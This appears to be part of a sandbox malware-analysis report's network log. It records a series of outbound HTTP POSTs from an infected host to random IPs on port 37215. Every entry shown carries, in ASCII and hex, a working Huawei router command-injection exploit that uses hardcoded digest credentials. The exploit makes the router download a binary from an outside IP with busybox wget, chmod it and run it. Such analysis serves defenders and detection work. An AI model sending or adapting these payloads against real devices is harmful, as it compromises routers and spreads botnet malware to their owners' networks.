                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              460192.168.2.1557886157.162.50.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719695091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              461192.168.2.1546708121.136.109.11937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719712019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              462192.168.2.154630694.97.65.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719728947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              463192.168.2.154133837.192.37.5337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719748974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              464192.168.2.1549908157.154.249.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719762087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              465192.168.2.154668631.28.101.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719780922 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              466192.168.2.155136441.248.2.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719794989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              467192.168.2.1549484121.200.28.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719813108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              468192.168.2.154647660.60.163.4837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719835043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              469192.168.2.154790294.157.97.11837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719856024 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              470192.168.2.1539974138.103.226.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719876051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
